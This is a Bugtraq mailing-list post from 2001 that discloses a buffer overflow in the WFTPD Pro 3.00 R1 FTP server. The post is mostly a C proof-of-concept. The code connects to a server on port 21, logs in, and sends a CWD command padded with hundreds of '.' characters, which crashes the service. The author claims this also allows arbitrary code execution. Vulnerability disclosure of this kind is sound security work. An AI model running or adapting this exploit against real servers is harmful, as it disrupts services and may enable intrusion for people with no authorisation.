Bugtraq mailing list archives
WFTPD Pro 3.00 R1 Buffer Overflow
From: se00020 () LION CC
Date: Sat, 3 Mar 2001 18:51:52 -0000
When sending a command (cwd) followed by a long argument (~500 char '.') the server crashes with: Anwendungspopup: WFTPD Service Control: WFTPD.EXE - Fehler in Anwendung: Die Anweisung in "0x2e2e2e2e" verweist auf Speicher in "0x2e2e2e2e". Der Vorgang "read" konnte nicht auf dem Speicher durchgeführt werden. which means in English: Exception fault at: 0x2e2e2e2e reading from 0x2e2e2e2e is not possible... Executing arbitrary code is possible The author has been contacted ---------------------- se00020 () fhs-hagenberg ac at or se00020 () lion cc Tested on win2k using trail version of WFTPD 3.00 R1 Simple exploit: //WFTPD Pro 3.00 R1 Buffer Overflow exploit //written by se00020 () fhs-hagenberg ac at #include <stdio.h> #include <winsock.h> #include <windows.h> #include <malloc.h> void main(){ SOCKET sock_victim; WORD version=MAKEWORD(1,1); WSADATA wsadata; SOCKADDR_IN victim; int sockid; char buffer[1024]; char exploitbuffer[800]={"CWD "}; char recvbuffer[1024]; WSAStartup(version, &wsadata); sock_victim=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); victim.sin_family=AF_INET; victim.sin_addr.s_addr=inet_addr ("10.17.3.44"); victim.sin_port=htons(21); sockid=connect(sock_victim, (sockaddr*) &victim, sizeof(victim)); recv(sock_victim, recvbuffer, sizeof (recvbuffer),0); memset(recvbuffer, '/0',sizeof(recvbuffer)); send(sock_victim, "USER test\r\n",strlen ("USER test\r\n"),0); recv(sock_victim, recvbuffer, sizeof (recvbuffer),0); memset(recvbuffer, '/0',sizeof(recvbuffer)); send(sock_victim, "PASS\r\n",strlen ("PASS\r\n"),0); recv(sock_victim, recvbuffer, sizeof (recvbuffer),0); memset(recvbuffer, '/0',sizeof(recvbuffer)); memset(exploitbuffer+4,'.',sizeof (exploitbuffer)-4); sprintf(buffer,"%s\r\n",exploitbuffer); send(sock_victim, buffer , sizeof(buffer),0); recv(sock_victim, recvbuffer, sizeof (recvbuffer),0); closesocket(sockid); closesocket(sock_victim); }
Current thread:
- WFTPD Pro 3.00 R1 Buffer Overflow se00020 (Mar 04)